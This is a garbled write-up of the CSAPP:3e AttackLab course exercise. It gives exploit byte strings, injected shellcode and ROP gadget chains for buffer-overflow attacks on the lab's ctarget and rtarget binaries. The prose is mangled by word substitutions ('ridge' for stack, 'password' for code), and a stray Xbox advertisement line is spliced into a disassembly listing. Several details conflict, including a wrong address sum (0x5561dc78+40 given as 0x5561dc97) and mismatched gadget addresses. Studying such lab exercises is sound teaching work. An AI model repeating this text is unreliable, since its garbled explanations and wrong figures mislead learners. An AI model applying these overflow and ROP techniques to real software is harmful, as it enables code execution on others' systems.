In depth expertise of the third edition of CSAPP:3e AttackLab experiment record

Keywords: encoding ascii


Read the lab manual and start law Attacklab

CTARGET step 1

The an initial Attack Phase needs calling the existing role touch1. This is simple. You must overwrite the an initial address the touch1 through the return attend to in the stack.

You are watching: Attack lab phase 2

First, usage gdb to debug ctarget and also disassemble the assembly password of getbuf:

\"*\"
It deserve to be uncovered that 0x28 (decimal is 40) Bytes stack framework is allocated here. Because the ridge is farming in the low attend to direction, it is better to store the beginning address of touch1 at the ar of% rsp+40. Through disassembling the password of touch1, the is not daunting to uncover that the beginning address the touch1 is 0x4017c0:
\"*\"
Therefore, the first 40 bytes that the building string room arbitrary (but cannot take 0A, because 0A is a newline character, the ctarget program judges the finish of input according to the newline character), and also then complies with 0x4017c0 (note to convert to the tiny end an approach at this time):
\"*\"
Save as phase1.txt.Enter command question:
\"*\"
Phase 1 passed.

Phase 2

Phase 2 requires a little piece of password to it is in injected and also the touch2(unsigned) role is dubbed with parameters.First the all, if you check out touch2 in the experiment manual, you must judge her cookie:

\"*\"
This cookie is a random number produced by the program, i m sorry is presented when the ctarget regime is started.Disassemble the touch2 function and find that the very first address that the touch2 duty is 0x4017ec:
\"*\"
We space going to inject the code right into the stack structure of getbuf. The speculative manual has actually said that the stack attend to of ctarget is fixed, i m sorry facilitates the password injection. Under gdb debugging, it is discovered that the stack frame deal with is 0x5561dc78:
\"*\"

First, perform the present information:Stack Address:0x5561dc78function touch2 address:0x00000000004017ecCookie:0x59b997faThen start writing the injected code. The objective of this code is to call touch2 with parameters

fun2:movl $0x59b997fa,%edipushq $0x4017ecretAssemble the target file, and also then use objdump -d to disassemble it to phase2.txt:

phase2.o: paper format elf64-x86-64Disassembly of section .text:0000000000000000 fun2>: 0:bf fa 97 b9 59 mov $0x59b997fa,%edi 5:68 ec 17 40 00 pushq $0x4017ec a:c3 retq store the binary part, finish 40 bytes, and also then append the deal with returned come the stack frame,Get the record phase2.txt:

bf fa 97 b9 59 /* movl $0x59b997fa,%edi */68 ec 17 40 00 /* movq $0x4017ec,(%rsp) */c3 /* retq */ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef78 dc 61 55 00 00 00 00Enter command question:

\"*\"

PS: that is also possible to compose the injection regime as follows:

fun2:movl $0x59b997fa,%edisubq $8,%rspmovq $0x4017ec,(%rsp)ret

CTARGET step 3

Read the handout file first. That is emphasized in the paper that the stack frame allocated by getbuf may be covered by the hexbatch role and the strncmp function. So we choose the parent stack frame of getbuf, the is, the stack framework of test role to save our string. Anyway, we will certainly not go back to the check function, and the routine will end execution in the touch3 duty body.

First of all, we identified the ridge frame attend to as 0x5561dc78 from the above question. Disassembly that touch3 duty found that the starting address that touch3 function was 0x4018fa, since we determined to save the string in the parent stack frame, the distance in between the string and the beginning address of ours stack frame is 40 bytes (from the above question, we recognize that getbuf has allocated 40 bytes of ridge frame). Therefore the beginning address the the string is 0x5561dc78+40Bytes=0x5561dc97.

So let\"s compose the injection Code:

movq $0x5561dc97,%rdipushq $0x4018faretqAfter assembly, to fill in the placeholder the 27Bytes in between the code and return address, and fill in the ASCII string of string at the end:

48 c7 c7 a8 dc 61 55 /* movq $0x5561dc97,%rdi */68 fa 18 40 00 /* pushq $0x4018fa */c3 /* retq */ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef /* useless bytes.total 27 bytes */78 dc 61 55 00 00 00 00 /* begin of password area */35 39 62 39 39 37 66 61 00 /* little endian depiction of string \"59b997fa\" , this string will certainly fill in duty test`s stack framework */Run program test, pass.

\"*\"

RTARGET step 2

RTARGET phase 2 requires to uncover the code composition gadget required through the strike from the existing password to repeat the ahead CTARGET step 2 experiment.First, in GDB. / rtarget, type the command disas / R start farm. Mid farm to view all the instructions and also their codes between start farm and mid Farm:

\"*\"
Because the above binary does no encode the COOKIE value 0x59b997fa i need, I have to put this worth on the stack, and also then popular music it up v the popq instruction and copy it to the% rdi register.

To watch the decompilation results, you require to uncover a popq instruction and a movq instruction. Therefore, you should divide them right into two gadgets. These 2 instructions must be followed straight by the 0xc3(retq) return instruction or the 0x90(nop) indict in the middle.

Let\"s uncover Gadget1 first. The encoding the the popq instruction is 0x58-0x5f. Watch the figure over and discover that the encoding with the beginning address the 0x4019cc meets the requirements:

58 90 c3 three hexadecimal codes space respectively POPQ% rax, nop, retq three instructions.

Come come Gadget2.The coding of movq instruction starts through 0x48 0x89, so that is quickly locked to the starting address 0x4017ec. Over there are 4 hexadecimal numbers under this address: 48 89 c7 c3, coded separatelyMovq% rax,% RDI, retq instructions, just satisfy the requirements.

Roughly draw the ridge distribution:

addressSpace effectActual content
%rsp+32touch2 duty start address0x4017ec
%rsp+24Gadget2 begin address0x4019a2
%rsp+16COOKIE value0x59b997fa
%rsp+8Gadget1 begin address0x4019cc

Therefore, the attack text is built as follows:

ef ef ef ef ef ef ef ef ef ef ef ef ef ef ef efef ef ef ef ef ef ef ef ef ef ef ef ef ef ef efef ef ef ef ef ef ef efcc 19 40 00 00 00 00 00 fa 97 b9 59 00 00 00 00a2 19 40 00 00 00 00 00 ec 17 40 00 00 00 00 00Running procedure, happen successfully:

\"*\"

RTARGET step 3

This subject is comparable to RTARGET Phase2. It also requires the combination of existing codes to realize the function of CTARGET phase 3.First, disassemble every the accuse from start farm to finish farm, and then note all possible instructions according to the figure in the speculative Manual (as shown below):

\"*\"

:b8 01 00 00 00mov $0x1,%eax0x0000000000401999 :c3retq0x000000000040199a :b8 fb 78 90 90mov $0x909078fb,%eax0x000000000040199f :c3retq0x00000000004019a0 :8d 87 48 89 c7 c3lea -0x3c3876b8(%rdi),%eax0x00000000004019a6 :c3retq0x00000000004019a7 :8d 87 51 73 58 90lea -0x6fa78caf(%rdi),%eax //58 90 c3 because that POPQ% rax; NOP; ret0x00000000004019ad :c3retq0x00000000004019ae :c7 07 48 89 c7 c7movl $0xc7c78948,(%rdi)0x00000000004019b4 :c3retq0x00000000004019b5 :c7 07 54 c2 58 92movl $0x9258c254,(%rdi)0x00000000004019bb :c3retq0x00000000004019bc :c7 07 63 48 8d c7movl $0xc78d4863,(%rdi)0x00000000004019c2 :c3retq0x00000000004019c3 :c7 07 48 89 c7 90movl $0x90c78948,(%rdi) //48 89 c7 for movq rdx,%rdi;89 c7 because that movl edx,%edi;90 because that nop0x00000000004019c9 :c3retq0x00000000004019ca :b8 29 58 90 c3mov $0xc3905829,%eax0x00000000004019cf :c3retq0x00000000004019d0 :b8 01 00 00 00mov $0x1,%eax0x00000000004019d5 :c3retq0x00000000004019d6 :48 8d 04 37lea (%rdi,%rsi,1),%rax0x00000000004019da :c3retq0x00000000004019db :b8 5c 89 c2 90mov $0x90c2895c,%eax //89 c2 90 because that movl% eax,% EDX0x00000000004019e0 :c3retq0x00000000004019e1 :c7 07 99 d1 90 90movl $0x9090d199,(%rdi)0x00000000004019e7 :c3retq0x00000000004019e8 :8d 87 89 ce 78 c9lea -0x36873177(%rdi),%eax0x00000000004019ee :c3retq0x00000000004019ef :8d 87 8d d1 20 dblea -0x24df2e73(%rdi),%eax0x00000000004019f5 :c3retq0x00000000004019f6 :b8 89 d1 48 c0mov $0xc048d189,%eax0x00000000004019fb :c3retq0x00000000004019fc :c7 07 81 d1 84 c0movl $0xc084d181,(%rdi)0x0000000000401a02 :c3retq0x0000000000401a03 :8d 87 41 48 89 e0lea -0x1f76b7bf(%rdi),%eax //48 89 e0 for movq% RSP,% rax0x0000000000401a09 :c3retq0x0000000000401a0a :c7 07 88 c2 08 c9movl $0xc908c288,(%rdi)0x0000000000401a10 :c3retq0x0000000000401a11 :8d 87 89 ce 90 90lea -0x6f6f3177(%rdi),%eax //89 ce 90 90 way movl% ECX,% ESI; NOP; NOP0x0000000000401a17 :c3retq0x0000000000401a18 :b8 48 89 e0 c1mov $0xc1e08948,%eax0x0000000000401a1d :c3retq0x0000000000401a1e :8d 87 89 c2 00 c9lea -0x36ff3d77(%rdi),%eax0x0000000000401a24 :c3retq0x0000000000401a25 :8d 87 89 ce 38 c0lea -0x3fc73177(%rdi),%eax //89 ce 38 c0 method movl% ECX,% ESI; cmpb% Al,% Al; keep in mind that cmpb has no effect on the regime at this time, i beg your pardon is equivalent to nop null operation.0x0000000000401a2b :c3retq0x0000000000401a2c :c7 07 81 ce 08 dbmovl $0xdb08ce81,(%rdi)0x0000000000401a32 :c3retq0x0000000000401a33 :b8 89 d1 38 c9mov $0xc938d189,%eax //89 d1 38 c9 means movl% EDX,% ECX; cmpb% Cl,% Cl (at this time, cmpb is identical to nop)0x0000000000401a38 :c3retq0x0000000000401a39 :8d 87 c8 89 e0 c3lea -0x3c1f7638(%rdi),%eax0x0000000000401a3f :c3retq0x0000000000401a40 :8d 87 89 c2 84 c0lea -0x3f7b3d77(%rdi),%eax //89 c2 84 c0 means movl% eax,% EDX; testb% Al,% Al; note that testb has actually no influence on the regimen at this time, i beg your pardon is identical to nop null operation.

See more: Microsoft Xbox One S 1Tb Halo, Xbox One S 1Tb Console Halo Wars 2 Bundle

0x0000000000401a46 :c3retq0x0000000000401a47 :8d 87 48 89 e0 c7lea -0x381f76b8(%rdi),%eax0x0000000000401a4d :c3retq0x0000000000401a4e :b8 99 d1 08 d2mov $0xd208d199,%eax0x0000000000401a53 :c3retq0x0000000000401a54 :b8 89 c2 c4 c9mov $0xc9c4c289,%eax0x0000000000401a59 :c3retq0x0000000000401a5a :c7 07 48 89 e0 91movl $0x91e08948,(%rdi)0x0000000000401a60 :c3retq0x0000000000401a61 :8d 87 89 ce 92 c3lea -0x3c6d3177(%rdi),%eax0x0000000000401a67 :c3retq0x0000000000401a68 :b8 89 d1 08 dbmov $0xdb08d189,%eax0x0000000000401a6d :c3retq0x0000000000401a6e :c7 07 89 d1 91 c3movl $0xc391d189,(%rdi)0x0000000000401a74 :c3retq0x0000000000401a75 :c7 07 81 c2 38 d2movl $0xd238c281,(%rdi)0x0000000000401a7b :c3retq0x0000000000401a7c :c7 07 09 ce 08 c9movl $0xc908ce09,(%rdi)0x0000000000401a82 :c3retq0x0000000000401a83 :8d 87 08 89 e0 90lea -0x6f1f76f8(%rdi),%eax0x0000000000401a89 :c3retq0x0000000000401a8a :8d 87 89 c2 c7 3clea 0x3cc7c289(%rdi),%eax0x0000000000401a90 :c3retq0x0000000000401a91 :b8 88 ce 20 c0mov $0xc020ce88,%eax0x0000000000401a96 :c3retq0x0000000000401a97 :c7 07 48 89 e0 c2movl $0xc2e08948,(%rdi)0x0000000000401a9d :c3retq0x0000000000401a9e :8d 87 89 c2 60 d2lea -0x2d9f3d77(%rdi),%eax0x0000000000401aa4 :c3retq0x0000000000401aa5 :b8 8d ce 20 d2mov $0xd220ce8d,%eax0x0000000000401aaa :c3retq0x0000000000401aab :c7 07 48 89 e0 90movl $0x90e08948,(%rdi)0x0000000000401ab1 :c3retq

Then we can around determine the assault scheme: placed the string in the stack. In stimulate to find the place of the string, we should take out the position at the optimal of the stack, and add the counter of the string position in the stack to type the cable address. The plan is around as complies with (A > B method to assign A come B)%rsp – >POPQ% rax;% eax – >%rdi+%rsi – >

The ridge is dispersed as follows: (address room grows up)

typecontent
Actual stringString content
Function addresstouch3 role start address
Gadget%rax–>%rdi
Gadget%rdi+%rsi–>%rax
Gadget%ecx–>%esi
Gadget%edx–>%ecx
Gadget%eax–>%edx
Offset valueString offset
Gadgetpopq %rax
Gadget%rax–>%rdt
Gadget%rsp–>rax

Finally, you must calculate the string offset value. Keep in mind that once executing the very first Gadget% rsp -- > rax, rsp in reality points to the start deal with of the 2nd Gadget, therefore the offset value the the string should be 9x8Byte=72Byte, that is, the hexadecimal worth 0x48.

The assault string is constructed as follows: (the first 40 EFS are used to to fill buf, complied with by the reverse order the the corresponding components in the stack (Gadget is the equivalent address))